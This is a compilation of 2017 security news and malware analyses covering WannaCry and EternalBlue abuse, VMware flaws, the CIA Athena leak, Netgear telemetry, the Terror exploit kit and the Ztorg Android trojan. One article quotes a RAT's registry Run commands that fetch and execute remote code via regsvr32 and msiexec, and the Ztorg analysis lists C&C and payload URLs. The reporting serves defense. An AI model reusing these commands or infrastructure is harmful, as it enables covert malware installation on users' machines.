Microsoft resolved the targeted SMB vulnerability in March and also released an emergency patch for unsupported platform versions on May 13, only one day after the ransomware outbreak started. In the aftermath of WannaCry, however, researchers discovered that both a crypto-currency mining botnet and a backdoor had been abusing the exploit for weeks. The exploit is also used by a ransomware family called UIWIX.

WannaCry hasn’t infected only PCs, but other types of machines as well, including medical devices. In fact, Britain’s National Health Service (NHS) was among the first organizations to have been hit by the malware.

Soon after the initial wave of infections, security researchers started observing new WannaCry variations, including some that didn’t use a kill-switch domain. What’s more, Cyphort researchers reported last week that a new ransomware variant was using a kill-switch domain that couldn’t be registered.

The variant uses a domain in the .test Top Level Domain, which cannot be registered, as it is reserved by the IETF (Internet Engineering Task Force) for testing purposes only, Cyphort says. Because the sample has been submitted to VirusTotal from 4 different countries (Germany, Australia, Denmark and South Korea), it’s unlikely that it is a test.

“It seems that the cyber criminals found a smarter way to evade sandbox detection by checking on a site that researchers cannot sinkhole. This technique allows the malware to spread again unchallenged. It is crucial that people patch Windows machines as soon as possible to close the SMB vulnerability and stop the spread of this ransomware. In the meantime, make sure you have a good backup of your important files,” Cyphort says.

In the meantime, security researchers are working on tools that can help WannaCry victims recover their files without paying the ransom. One of them is Wannakey, designed to extract key material from infected Windows XP PCs. However, it requires a second tool to decrypt files.

Building on Wannakey and already tested by Europol, a tool called wanakiwi appears more suited for the file decryption/restoration operation. One thing that both tools require, however, is that the WannaCry-infected computers haven’t been rebooted after the encryption took place. Already confirmed to work on Windows XP, 7, and Server 2003 (x86), wanakiwi might also work on Vista and Server 2008 and 2008 R2.


VMware Patches Workstation Vulnerabilities

23.5.2017 securityweek Vulnerebility
VMware informed customers last week that updates released for the Linux and Windows versions of Workstation patch privilege escalation and denial-of-service (DoS) vulnerabilities.

One of the flaws, discovered by Jann Horn of Google Project Zero and tracked as CVE-2017-4915, affects VMware Workstation Pro and Player 12.x on Linux. The weakness has been classified as “important” severity.

The security hole, described as an insecure library loading vulnerability, allows an unprivileged host user to escalate their privileges to root on the host via ALSA sound driver configuration files.

The second vulnerability, identified by Borja Merino and tracked as CVE-2017-4916, affects VMware Workstation Pro and Player 12.x on Windows.

This “moderate” severity flaw is a NULL pointer dereference issue that exists in the vstor2 driver. An attacker with regular host user privileges can exploit the vulnerability to cause a DoS condition on the host machine.

The vulnerabilities have been patched with the release of VMware Workstation 12.5.6. There are no workarounds for either of the flaws.

VMware has released eight other security advisories this year, including for an Apache Struts 2 vulnerability that had been exploited in the wild, and security bugs disclosed by white hat hackers at this year’s Pwn2Own competition.

Exploits involving VMware virtual machine escapes earned participants more than $200,000 at Pwn2Own 2017. Researchers at Qihoo 360 received $105,000 for an Edge exploit that achieved a VM escape, while Tencent Security’s Team Sniper earned $100,000 for a Workstation exploit.


WikiLeaks Details Malware Made by CIA and U.S. Security Firm

22.5.2017 securityweek BigBrothers
WikiLeaks has published documents detailing another spy tool allegedly used by the U.S. Central Intelligence Agency (CIA). The latest files describe “Athena,” a piece of malware whose developers claim it works on all versions of Windows.

Documents apparently created between September 2015 and February 2016 describe Athena as an implant that can be used as a beacon and for loading various payloads into memory. The tool also allows its operator to plant and fetch files to or from a specified location on the compromised system.

A leaked diagram shows that Athena can be loaded onto the targeted computer by an asset, a remote operator, or via the supply chain. The implant is said to work on all versions of Windows from XP through 10, including Windows Server 2008 and 2012, on both x86 and x64 architectures.

While WikiLeaks has not made available the actual Athena tool, experts pointed out that the leaked documents include information on file and registry changes made by the implant, which can be useful for determining if a system has been compromised.

The documents also show that Athena was developed in collaboration with Siege Technologies, a U.S.-based company that provides offensive-driven cybersecurity solutions. The firm was acquired last year by Nehemiah Security.

WikiLeaks pointed to an email stolen from Italian spyware maker Hacking Team in which Siege Technologies founder Jason Syversen says he’s “more comfortable working on electronic warfare.”

Since March 8, when it first announced the Vault 7 files focusing on the CIA’s hacking capabilities, WikiLeaks has regularly published documents describing various implants allegedly used by the agency. The latest leaks have focused on Windows hacking tools, including for man-in-the-middle (MitM) attacks on the LAN, for hampering malware attribution and analysis, and creating custom malware installers.

Many of the tech companies whose tools are targeted by the Vault 7 exploits claimed their latest products are not affected. Only Cisco admitted finding a critical vulnerability that had exposed many of the company’s switches.

The Vault 7 files and the exploits leaked by the hacker group called Shadow Brokers, including ones used in the recent WannaCry ransomware attacks, have once again brought exploit stockpiling by governments into the spotlight.

“We have seen vulnerabilities stored by the CIA show up on WikiLeaks, and now this vulnerability stolen from the NSA has affected customers around the world. Repeatedly, exploits in the hands of governments have leaked into the public domain and caused widespread damage,” said Microsoft president and chief legal officer Brad Smith.

In response to concerns over the stockpiling of exploits, a group of U.S. lawmakers last week proposed a new bill, the “Protecting Our Ability to Counter Hacking Act of 2017” (PATCH Act), which aims to help find a balance between national security needs and public safety.


At least 3 different groups have been leveraging the NSA EternalBlue exploit, what’s went wrong?
22.5.2017 securityaffairs BigBrothers

At least 3 different groups have been leveraging the NSA EternalBlue exploit weeks before the WannaCry attacks, here’s the evidence.
In the last days, security experts discovered numerous attacks that have been leveraging the same EternalBlue exploit used by the notorious WannaCry ransomware.

The Shadow Brokers hacker group revealed the exploit for the SMB vulnerability in April, but according to malware researchers, other threats used it such as the Adylkuzz botnet that is active since April 24.

Security experts at Cyphort found evidence on a honeypot server that threat actors in the wild were already exploiting the SMB flaw in early May to deliver a stealth Remote Access Trojan (RAT) instead of ransomware.

The RAT didn’t show worm network worm capabilities like the WannaCry ransomware.

The malware is delivered from an IP (182.18.23.38) located in China.

“Once the exploitation is successful, the attacker will send an encrypted payload as a shellcode. The shellcode is encrypted via XOR with the key, “A9 CA 63 BA”. The shellcode has an embedded binary in it as shown below:” reads the analysis published by Cyphort. “The embedded DLL is basically a trojan which downloads additional malware and receives commands from its controller.”

Once infected a system, the malicious code closes the port 445 to prevent other malware from abusing the same SMB flaw.

This aspect suggests the attacker was aware of the EternalBlue vulnerability.

“This is yet another indication that the malware is probably aware of the Eternal Blue vulnerability and is closing it.” continues the analysis. “The threat actors probably did not want other threats mingling with their activity. We believe that the group behind this attack is the same group that spreads Mirai via Windows Kaspersky discovered in February. We found similarities in terms of their IOCs.”

The RAT sets the following Registry Run entries to download and execute additional malware.

reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v “start1” /d “msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q” /f
The malicious code attempts to delete a number of users and terminate and/or delete various files or processes. The experts also noticed that it is connected to a remote access tool hosted on a Chinese website, ForShare 8.28.

The malware can be instructed by the C&C server to execute various commands, including the screen monitoring, capturing audio and video, monitoring keystrokes, transfer data, deleting files, terminating processes, downloading and executing files and many other operations.

The report published by Cyphort included the Indicators of Compromise for this specific threat.

The facts that multiple groups have been exploiting ETERNALBLUE weeks before WannaCry is also demonstrated by an analysis published by Secdo.

Secdo claims to have found evidence of ransomware abusing EternalBlue flaw weeks before WannaCry emerged.

“Secdo has uncovered a new evasive attack that leaves no trace and has been infecting organizations using NSA exploits since the mid-April.” reads the analysis published by Secdo. “The ransomware is the most apparent payload, yet under the surface a more sophisticated attack occurred that would have gone unnoticed.”

EternalBlue SMB flaw

The researchers also reported that threat actors in the wild were using an EternalBlue-based worm to infect all machines in a compromised network and exfiltrate login credentials.

Recently experts at Heimdal discovered the UIWIX ransomware, a fileless malware exploiting the EternalBlue vulnerability.

Like the WannaCry, UIWIX exploits the same vulnerability in Windows SMB protocol, but the new threat has the ability to run in the memory of the infected system after the exploiting of the EternalBlue.

In late April, The experts at Secdo also discovered another attack exploiting the EthernalBlue vulnerability, it was associated with a Chinese threat actor that used a botnet to distribute a backdoor.

“It begins by spawning a thread inside of lsass.exe, similar to the credential theft attack, only instead of remaining purely in-memory, the initial payload connects back to a Chinese C2 server on port 998 (2.x.x.x) and downloads a known root-kit backdoor (based on Agony).” reads the analysis published by Secdo.

“The file is dropped in %programdata% under the name 666.exe. Existing NG-AV vendors that were present were able to block 666.exe from running, but remained oblivious to the malicious thread running inside of lsass.exe.”

Summarizing, at least 3 different groups have been leveraging the NSA exploit weeks before the WannaCry, this means a significant portion of the security community failed to monitor the threat or that failed to share the information about the attacks they have observed.

The success of EternalBlue attacks are the failure of our current model of cyber security.


Netgear Now Collects Router 'Analytics Data' — Here’s How to Disable It
22.5.2017 CyberSpy

Is your router collects data on your network?
Netgear last week pushed out a firmware update for its wireless router model NightHawk R7000 with a remote data collection feature that collects router's analytics data and sends it to the company's server.
For now, the company has rolled out the firmware update for its NightHawk R7000, but probably other router models would receive the update in upcoming days.
The Netgear's alleged router analytics data collects information regarding:
Total number of devices connected to the router
IP address
MAC addresses
Serial number
Router's running status
Types of connections
LAN/WAN status
Wi-Fi bands and channels
Technical details about the use and functioning of the router and the WiFi network.
The company said it is collecting the data for routine diagnostic to know how its products are used and how its routers behave.
"Technical data about the functioning and use of our routers and their WiFi network can help us to more quickly isolate and debug general technical issues, improve router features and functionality, and improve the performance and usability of our routers," Netgear said on its website.
How to Disable your Router Analytics Data Collection Feature
But if you are privacy conscious and don't want Netgear to collect details on you, you can disable this feature.
The company has provided an option in the router's configuration panel to turn the router analytics data collection feature off. Follow the instructions:
Launch a web browser from your PC or smartphone that is connected to the network.
Open the router login window by entering http://www.routerlogin.net.
Type the router username and password. If you haven't changed the default settings, your username is admin, and password is password.
Select Advanced → Administration → Router Update on the Home page.
Scroll down to the Router Analytics Data Collection section and select the Disable button to disable router analytics data collections.
Click the Apply button to save your settings.
That's it. You're done.
Boost And Secure Your Routers With DD-WRT

Alternatively, you can replace your device firmware with DD-WRT – a Linux-based open source firmware that is designed to enhance security and performance of wireless Internet routers.
Security conscious people always prefer DD-WRT firmware over their factory default firmware, which is compatible with many router models from popular manufacturers such as LinkSys, Cisco, Netgear, Asus, TP-Link, D-Link and more.
DD-WRT has a ton of features – it improves your wireless signal, as well as unlocks your router's potential to manage network traffic, static routing, VPN, repeating functions and more.
To check if your router is compatible with DD-WRT, head on to 'DD-WRT database' and search for your router model number.

If it's there and supported, then download it and follow below-mentioned general steps to install it:
Log into your router's admin page (usually at http://192.168.1.1/).
Go to the Admin section and choose "Firmware Upgrade."
Choose "Select File" and find your DD-WRT firmware.
Upload it and do not unplug or do anything to the router until it finishes updating.
Note: Changing your router's firmware with a non-compatible firmware can brick your router. So be very careful.


Experts discovered that the Terror Exploit Kit now includes fingerprinting capabilities
22.5.2017 securityaffairs Exploit

Experts from Talos Team discovered changes made to the Terror exploit kit (EK) that allow it to fingerprint victims and target specific vulnerabilities.
Recent changes made to the Terror exploit kit (EK) allow it to fingerprint victims and target specific vulnerabilities instead of carpet bombing the victims with many exploits at the same time, Talos researchers discovered.

Last week I reported the news of the improvements of the Stegano Exploit kit, today we will speak about the Terror exploit kit that now includes fingerprinting capabilities.

The Terror Exploit Kit first appeared in the threat landscape in January 2017, in April experts observed a significant increase of hacking campaigns leveraging the EK.

Because of similarities with Sundown EK, experts at MalwareBytes initially thought that the Terror EK was simply a new variant of Sundown, but further investigation revealed that it was actually from a different actor (so-called Terror EK by Trustwave).

The Terror EK was advertised on various underground forums by a hacker with the online moniker @666_KingCobra that is offering it for sale under different names (i.e. Blaze, Neptune, and Eris).

Experts at Malwarebytes Labs said that the Terror EK was used in a malvertising campaign distributing the Smoke Loader by exploiting Internet Explorer, Flash, and Silverlight exploits.

The Terror EK was also involved in a campaign using a different landing page that distributes the Andromeda malware.

The compromised websites were used to redirect to the exploit kit landing page via server 302 redirect call and done via script injection.

The powerful exploit kit was observed carpet bombing victims using many exploits at the same time, but now experts from Talos group observed a significant change in their tactic. News of the day is that the Terror Exploit Kit was improved with new exploits and implemented fingerprinting abilities. These latter features allow the EK to determine what exploit would be used in order to compromise the target system.

The new variant of the Terror Exploit Kit was able to determine the specific OS running on the victim’s PC, the browser version, installed security patches and plugins.

The researchers were served different files when accessing the site via different browsers, such as Internet Explorer 11 or Internet Explorer 8.

Talos malware researchers identified a potentially compromised legitimate website that operates as a malware gate. The website was initially used to redirect visitors to a RIG landing page, after a single day of analysis the gate switched to Terror exploit kit.

“Terror seems to constantly evolving. In this campaign it has added further exploits and no longer carpet bombs the victim. Instead it evaluates data regarding the victim’s environment and then picks potentially successful exploits depending on the victim’s operating system, patch level, browser version and installed plugins. This makes it harder for an investigator to fully uncover which exploits they have.” reads the analysis published by Talos.
“It is interesting to note that the adversaries are using an URL parameter in cleartext for the vulnerability they are going to exploit, e.g. cve2013-2551 = cve20132551 in the URL.”

The compromised website discovered by Talos experts redirects users to the EK landing page by using an HTTP 302 Moved Temporarily response, like previous campaigns.

Terror Exploit Kit

The page uses obfuscated Javascript code to determine the victim’s browser environment, then uses the return value of this function to submit a hidden form called ‘frm’.

“As mentioned in the executive overview, it uses some obfuscated Javascript code to evaluate the victim’s browser environment, for example it tries to get version information about the following plugins: ActiveX, Flash, PDF reader, Java, Silverlight, QuickTime, etc. Then it uses the return value of this function to submit the hidden form called ‘frm’.” continues the analysis.

The EK also uses cookie-based authentication for downloading the exploits, which prevents third-parties from accessing them, the security researchers discovered. This approach prevents not only investigators from learning where from or how the victims were infected, but also stops competitors from stealing the exploits.

“We have seen that the exploit kit market is experiencing an ongoing change. Big players in this market disappear while new ones show up. The new players are fighting for customers by constantly improving their quality and techniques. They modify these techniques on an ongoing basis to improve their capability to bypass security tools. This clearly shows how important it is to make sure that all your systems are up to date,” concluded Talos.


 


Ztorg: money for infecting your smartphone
22.5.2017 Kaspersky  Mobil

This research started when we discovered an infected Pokémon GO guide in Google Play. It was there for several weeks and was downloaded more than 500,000 times. We detected the malware as Trojan.AndroidOS.Ztorg.ad. After some searching, I found some other similar infected apps that were being distributed from the Google Play Store. The first of them, called Privacy Lock, was uploaded to Google Play on 15 December 2016. It was one of the most popular Ztorg modifications, with more than 1 million installations.

After I started tracking these infected apps, two things struck me – how rapidly they became popular and the comments in the user review sections.

Popularity

These infected apps quickly became very popular, gaining thousands of new users each day!

For example, com.fluent.led.compass had 10,000–50,000 installations the day I found and reported it to Google.

Ztorg: money for infecting your smartphone

However, it still wasn’t deleted from Google Play the next day and the number of installations increased tenfold to 100,000–500,000. It means there were at least 50,000 new infected users in the space of just one day.

Comments

There were lots of comments saying that people downloaded these apps for credits/coins/etc.

Ztorg: money for infecting your smartphone

Ztorg: money for infecting your smartphone

Ztorg: money for infecting your smartphone

In some of these comments the users mentioned other apps – Appcoins, Advertapp, etc.

That’s where this latest research work started.

Advertising

Apps that pay users

The app mentioned most in the comments was Appcoins, so I installed it. After that, the app prompted me to install some other apps, including one that was malicious, for $0.05.

Ztorg: money for infecting your smartphone

To be honest, I was surprised that only one was malicious – all the other apps were clean.

The funny thing is that they check for root rights on the device and don’t pay those that have them. And the first thing that Ztorg did on the device after infection started was to get superuser rights.

I contacted the Appcoins developers to try and find out where this malicious advertising offer came from, but they deleted the offer and answered me by saying there was no malware and that they had done nothing wrong.

Then I analyzed the apps installed by infected users and made a list of the most popular ones that paid users to install software:

Ztorg: money for infecting your smartphone

mobi.appcoins

https://play.google.com/store/apps/details?id=mobi.appcoins

Ztorg: money for infecting your smartphone

com.smarter.superpocket

https://play.google.com/store/apps/details?id=com.smarter.superpocket

Ztorg: money for infecting your smartphone

com.moneyreward.fun

https://play.google.com/store/apps/details?id=com.moneyreward.fun

And of course they offered malware too:

Ztorg: money for infecting your smartphone

Ztorg: money for infecting your smartphone

All these offered users 0.04-0.05 USD for installing an app infected with Ztorg from Google Play.

Campaigns

So I decided to take a closer look at these offers and the dumped traffic for these apps.

A typical session in which an advertising app turned into a malicious one was as follows:

App receives offers, including malicious ones, from its server (for example, moneyrewardfun[.]com). Malicious offers are sent from well-known ad services (usually supersonicads.com and aptrk.com).

After a few redirections from ad service domains (in one case there were 27 redirections) the app goes to global.ymtracking.com or avazutracking.net. These URLs are related to the ads too.

Then it redirects to track.iappzone.net.

And the final URL that leads to the Google Play Store was app.adjust.com.

All the offers that I was able to dump had track.iappzone.net and app.adjust.com.

adjust.com is a well-known “business intelligence platform”; the URLs that are used in malicious campaigns look like this:

https://app.adjust.com/4f1lza?redirect=https://play.google.com/store/apps/details?id=com.game.puzzle.green&install_callback=http://track.iappzone.net…

By analyzing these URLs we can identify infected apps on Google Play.

Malicious server

URLs from iappzone.net look like this:

http://track.iappzone.net/click/click?offer_id=3479&aff_id=3475&campaign=115523_201|1002009&install_callback=http://track.supersonicads.com/api/v1/processCommissionsCallback.php?advertiserId=85671&password=540bafdb&dynamicParameter=dp5601581629793224906

This URL structure (offer_id=..&aff_id=..&campaign=..) is related to the OffersLook tracking system. It contains many interesting things, like offer id, affiliate id. But it turns out that cybercriminals use different values for them, making these parameters unusable for us. Except one – install_callback. This parameter contains the name of the ad service.

While searching for iappzone.net I was able to find some APK files that contained this URL. All of those files are detected by Kaspersky Lab products as Ztorg malware. The interesting thing was that iappzone.net used the IP 52.74.22.232. The same IP was used by aedxdrcb.com, which was mentioned in CheckPoint’s gooligan report. A few weeks after that report was made public, iappzone.net (which wasn’t mentioned in the report) was moved to a new IP – 139.162.57.41.

Ad modules

Luckily I was able to find iappzone.net not only in the APK files but also in network traffic from clean apps. All these apps had an advertising module – Batmobi or Mobvista in most cases. Network traffic from these ad modules looked similar to the network traffic from the apps that paid users to install promoted apps.

Here is an example of an app with a Batmobi ad module. The module received a JSON file with offers from their server api2.batmobil.net.

Ztorg: money for infecting your smartphone

The user sees a list of advertised apps:

Ztorg: money for infecting your smartphone

After the user clicks on the ads, they are redirected to the Google Play Store.

Ztorg: money for infecting your smartphone

In this case, the redirects look like this:

api2.batmobil.net -> global.ymtracking.com->tracking.acekoala.com -> click.apprevolve.com ->track.iappzone.net ->app.adjust.com -> play.google.com

After analyzing ad campaigns containing iappzone.net, I was able to find almost 100 infected apps being promoted on Google Play.

The other interesting aspect of these campaigns was that their URLs contained the install_callback parameter that I mentioned earlier. Turns out the cybercriminals only used four ad networks.

Ad sources

track.iappzone.net callbacks

Yeahmobi (global.ymtracking.com) 41%
Mobvista (next.mobvista.com) 34%
Avazu (postback.apx.avazutracking.net) 18%
Supersonicads (track.supersonicads.com) 7%
However, this doesn’t mean that malware was only being distributed through these four networks. These ad networks are selling their ads to a wide range of advertising companies. In my research, I saw some malicious ads coming from other advertising networks like DuAd or Batmobi, but after a few redirects these ads were always pointing to one of the four advertising networks listed above.

Furthermore, I tracked several malicious ad campaigns that looked like this:

Batmobi -> Yeahmobi-> SupersonicAds

which means that these networks also redistribute ads to each other.

I wasn’t able to find any other ad networks in the install_callback parameter until the end of March 2017.

Other sources

During my research I found some infected apps that were not promoted by these advertising networks. When I looked at their detection paths I found that there were several patterns to them. Most of the paths where these apps were detected (except the installation path /data/app) were as follows:

[sdcard]/.android/ceroa/play/
[sdcard]/.nativedroid/download/
[sdcard]/.sysAndroid/download/
[sdcard]/.googleplay_download/
[sdcard]/.walkfree/apks/583737491/
[sdcard]/Android/data/TF47HV2VFKD9/
[sdcard]/Android/Data/snowfoxcr/
[sdcard]/DownloadProvider/download/
I analyzed the apps using these paths and discovered that all of them are already detected by Kaspersky Lab products as adware or malware. However, the apps downloaded to these folders are not all malicious – most of them are clean.

Folder’s name Type Detection %*
DownloadProvider Malware 81%
TF47HV2VFKD9 Malware 56%
snowfoxcr AdWare 51%
nativedroid Malware 48%
.walkfree AdWare 33%
ceroa AdWare 20%
sysAndroid Malware 16%
.googleplay_download Malware 15%
* Malicious apps that were downloaded to a specific folder as a percentage of all apps in that folder.

Infected apps

Similar apps

All the infected apps that I analyzed surprised me in that they don’t look like they were patched with malware code. In many other cases, cybercriminals just add malicious code to clean apps, but not in this case. Looks like these apps were created especially for distributing malware.

Publishers from Google Play

Some of the publishers’ emails from Google Play:

com.equalizer.goods.listener trantienfariwuay@gmail.com
com.ele.wall.papers nguyenduongsizang@gmail.com
com.game.free.plus.prefect liemproduction08@gmail.com
com.green.compass.star longhahoanghuong@gmail.com
com.voice.equalizer.musicssss baoanstudio@gmail.com
com.amusing.notes.done trunggapin@gmail.com
com.booster.ram.app.master.clean lakonmesminh@gmail.com
com.game.puzzle.green zentinlong@gmail.com
com.listen.music.pedometer tramhuyenthoai9a@gmail.com
com.live.paper.watch.analog nguyenthokanuvuong@gmail.com
When I started to search for them, I found that most of the emails are related to Vietnam.

For example:

trantienfariwuay -> tran tien [fariwuay] – Vietnamese singer

liemproduction08 -> liem production [08] – Thuat Liem Production, company from Ho Chi Minh City, Vietnam

nguyenthokanuvuong -> nguyen [thokanu] vuong – Vietnamese version of Chinese name Wang Yuan

Malicious modules

Almost all of the infected apps from Google Play contain the same functionality – to download and execute the main module. During this research, I found three types of modules with this functionality.

Dalvik

Every infected app from Google Play with this type of malicious module was protected by the packer. I will describe the app with the package name com.equalizer.goods.listener. It was packed using the Qihoo packer. This app has many different classes and only a few of them are related to the malicious module. Malicious code will be triggered by the PACKAGE_ADDED and PACKAGE_REMOVED system events. It means that malicious code only starts executing after the user installs/updates/removes an app.

Ztorg: money for infecting your smartphone

As a first step, the malicious module will check if it’s running on a virtual machine, emulator or sandbox. To do so, it will check several dozen files that exist on different machines and several dozen values for different system properties. If this check is passed, the Trojan will start a new thread.

In this new thread the Trojan will wait a random amount of time, between an hour and an hour and a half. After waiting it will make a GET HTTP request to the C&C (em.kmnsof.com/only) and, as a result, the Trojan will receive a JSON file encrypted with DES. This JSON should contain a URL from which a file can be downloaded. The file is an ‘xorred’ JAR that contains the malicious classes.dex – the main module.

Native

Since October 2016 I’ve reported lots of apps with this malicious module to Google, so they were able to improve their detection system and catch almost all of them. This meant the cybercriminals had to bypass this detection. In the beginning they changed some methods in the code and used commercial packers. But in February 2017 they rewrote the entire code, moving all functionality to the ELF (native, .so) library.

Example: com.unit.conversion.use (MD5: 92B02BB80C1BC6A3CECC321478618D43)

The malicious code is triggered after app execution starts from the onCreate method.

Ztorg: money for infecting your smartphone

The malicious code in the infected classes.dex is simple – it starts a new thread that loads the MyGame library and it has two methods for dealing with sandbox detections, which will be executed from the library.

Ztorg: money for infecting your smartphone

Ztorg: money for infecting your smartphone

In this version, the delays are much smaller than in the previous one – it waits only 82 seconds before execution.

After starting, the MyGame library will check if it’s running in a sandbox by executing the two methods from classes.dex. One will try to register the receiver for the BATTERY_CHANGED action and check if it’s correct. Another method will try to get application info about the com.android.vending package (Google Play Store) with the MATCH_UNINSTALLED_PACKAGES flag. If both of these methods return “false”, the malicious library will execute a GET request to the command server.

Ztorg: money for infecting your smartphone

It receives: “BEgHSARIB0oESg4SEhZcSUkCCRFICAUSHwoLEhZIBQkLSQ4fSQ4fVlZVSQEWVlZVSAcWDUpeVg==”

Ztorg: money for infecting your smartphone

The library will decode this answer and xor it with a 0x66 key.

Result:

b.a.b.a,b,http://dow.nctylmtp.com/hy/hy003/gp003.apk,80

g_class_name = b.a.b.a

g_method_name = b

g_url = http://dow.nctylmtp.com/hy/hy003/gp003.apk

g_key = 80

The .apk file available at g_url will be downloaded into the cache folder of the app folder (/data/data/<package_name>/cache). The library will xor it with g_key and load it using a ClassLoad method from the DexClassLoader class.

As we can see, the cybercriminals changed a lot in the malicious code, and replaced the Java code with C code. But the functionality remains the same – connect to the C&C, download and execute the main module.

Detection bypassing

Once I was able to receive the package IDs from these campaigns, I installed the infected app from Google Play on my test device and… nothing happened. After some investigating, I found that the cybercriminals only return a malicious payload to users that install apps via ads. However, some of the other infected apps started to infect my test phone when installed directly from Google Play – without clicking on any ads.

Dropper

In April 2017 the cybercriminals changed their Ztorg code again. In this third type of malicious module, the cybercriminals moved all the functionality back to classes.dex. The main difference with the previous version is that it’s no longer a Trojan-Downloader. It doesn’t download the main module from a malicious server; instead it contains an encrypted module in the Assets folder of the installation package. The file called info.data is xored with 0x12 and then loaded using the ClassLoad method.

Ztorg: money for infecting your smartphone

Payload (main module)

In all the attacks that I analyzed the main module had the same functionality. I’ll describe one of the most recent – 2dac26e83b8be84b4a453664f68173dd. It was downloaded by the com.unit.conversion.use app using the malicious MyGame library.

This module is downloaded by the infection module and loaded using the ClassLoad method. The main purpose of the module is to gain root rights and install other modules. It does this by downloading or dropping some files.

Some files can only be dropped from this module; there are no URLs for them.

Some of the URLs with the down.118pai.com domain didn’t work at the time of this research. All files that have these URLs can be dropped. All files that have URLs only and cannot be dropped have URLs with the domains sololauncher.mobi and freeplayweb.com, which were accessible at the time of this research.

In one of the previous versions of the main module, dated September 2016, all the URLs had the down.118pai.com domain and were available at that time.

Some of the dropped/downloaded malicious files will be added to the /system/etc/install-recovery.sh file. It means that these files will remain on the device even after a reset to factory settings.

All files that are dropped and downloaded by this module can be divided into a few groups:

Clean files, tools

File name Tool name MD5
data/files/.zog/.a chattr 9CAE8D66BE1103D737676DBE713B4E52
data/files/.zog/.a chattr 1E42373FA7B9339C6C0A2472665BF9D4
data/files/.zog/supolicy supolicy cdceafedf1b3c1d106567d9ff969327a
data/files/.zog/busybox busybox 3bc5b9386c192d77658d08fe7b8e704f
data/files/.zog/.j Patched su 8fb60d98bef73726d4794c2fc28cd900
Exploits, exploit packs, exploit droppers

File Name Name MD5 Detection name
data/files/.Ag/Agcr Agcr32 D484A52CFB0416CE5294BF1AC9346B96 Exploit.AndroidOS.Lotoor.bv
data/files/.Ag/Agcr Agcr64 B111DD21FD4FCEFDC8268327801E55CE Exploit.AndroidOS.Lotoor.bv
data/files/.zog/.ag/bx Bx 70EBFA94C958E6E6A7C6B8CD61B71054 Exploit.AndroidOS.Lotoor.bu
data/files/.zog/.ag/cx cx 892E033DA182C06794F2B295377B8A65 Exploit.AndroidOS.Lotoor.bu
data/files/.zog/exp exp 6E17234C57308012911C077A376538DC Exploit.AndroidOS.Lotoor.bz
data/files/.zog/.ag/nn.zip maink.apk/boy ab9202ccfdd31e685475ba895d1af351 script
data/files/.zog/.ag/nn.zip maink.apk/bx 70ebfa94c958e6e6a7c6b8cd61b71054 Exploit.AndroidOS.Lotoor.bu
data/files/.zog/.ag/ym ym32 F973BAA67B170AB52C4DF54623ECF8B3 Exploit.AndroidOS.Lotoor.bu
data/files/.zog/.ag/ym ym64 807A6CF3857012E41858A5EA8FBA1BEF Exploit.AndroidOS.Lotoor.bu
data/files/.zog/.aa mainp.apk/r1 c27e59f0f943cf7cc2020bda7efb442a Exploit.AndroidOS.Lotoor.bh
data/files/.zog/.aa mainp.apk/r2 368df668d4b62bdbb73218dd1f470828 Exploit.AndroidOS.Lotoor.bi
data/files/.zog/.aa mainp.apk/r3 fb8449d1142a796ab1c8c1b85c7f6569 Exploit.AndroidOS.Lotoor.bh
data/files/.zog/.aa mainp.apk/r4 04dd488783dffcfd0fa9bbac00dbf0f9 Exploit.Linux.Enoket.a
data/files/.zog/.ad mainmtk.apk b4b805dc90fa06c9c7e7cce3ab6cd252 Exploit.AndroidOS.Lotoor.bi
data/files/.zog/.ag/np np 1740ae0dc078ff44d9f229dccbd9bf61 Exploit.Linux.Enoket.a
Most of these files will be downloaded by the Trojan, but some of them can only be dropped from the Trojan body. However, most of the downloaded files are the same as they were seven months ago in September 2016.

Native (ELF) malicious modules

File Name MD5 Path after infection Detection name
data/files/.zog/.am b30c193f98e83b7e6f086bba1e17a9ea /system/xbin/.gasys Backdoor.AndroidOS.Ztorg.j
data/files/.zog/.an 41ab20131f53cbb6a0fb69a143f8bc66 /system/lib/libgstdsys.so Backdoor.AndroidOS.Ztorg.j
data/files/.zog/.b ae822aed22666318c4e01c8bd88ca686 /system/xbin/.gap.a Backdoor.AndroidOS.Ztorg.c
data/files/.zog/.k 5289027ca9d4a4ed4663db445d8fc450 /system/bin/debuggerd Backdoor.AndroidOS.Ztorg.c
data/files/.zog/.m 5af47875666c9207110c17bc8627ce30 /system/bin/ddexe script
data/files/.zog/.c d335ac148f6414f0ce9c30ac63c20482 /system/xbin/.gap Backdoor.AndroidOS.Ztorg.c
All of these files can only be dropped from the Trojan’s body. They are not downloaded.

Malicious apps

File Name Name MD5 Path after infection Detection name
data/files/.zog/.l mains.apk 87030ae799e72994287c5b37f6675667 /system/priv-app/dpl.apk Trojan-Dropper.AndroidOS.Agent.cv
data/files/.zog/.o mains2.apk 93016a4a82205910df6d5f629a4466e9 /system/priv-app/.gmq.apk Trojan.AndroidOS.Boogr.gsh
data/files/.zog/.n mainm.apk 6aad1baf679b42adb55962cdb55fb28c /system/priv-app/.gma.apk Backdoor.AndroidOS.Ztorg.a
data/files/.zog/.al .al 7d7247b4a2a0e73aaf8cc1b5c6c08221 /system/priv-app/.gmtgp.apk Trojan.AndroidOS.Hiddad.c
.gmtgp.apk (7d7247b4a2a0e73aaf8cc1b5c6c08221)

This app is detected as Trojan.AndroidOS.Hiddad.c. It downloads (from the C&C http://api.ddongfg.com/pilot/api/) an additional encrypted module, decrypts and loads it. In my case it downloads Trojan-Clicker.AndroidOS.Gopl.a (af9a75232c83e251dd6ef9cb32c7e2ca).

Its C&C is http://g.ieuik.com/pilot/api/; additional domains are g.uikal.com and api.ddongfg.com.

The Trojan uses accessibility services to install (or even buy) apps from the Google Play Store.

Ztorg: money for infecting your smartphone

It also downloads apps into the .googleplay_download directory on the SD card and installs them using accessibility services to click buttons. The folder .googleplay_download is one of the sources used to spread the Ztorg Trojan. It can click buttons that use one of 13 languages – English, Spanish, Arabic, Hindi, Indonesian, French, Persian, Russian, Portuguese, Thai, Vietnamese, Turkish and Malay.

dpl.apk (87030AE799E72994287C5B37F6675667)

This module contains the same methods to detect emulators, sandbox and virtual machines as in the original infected module.

It downloads an encrypted file from the C&C api.jigoolng.com/only/gp0303/12.html into the file /.androidsgqmdata/isgqm.jar. After decryption, the Trojan loads this file.

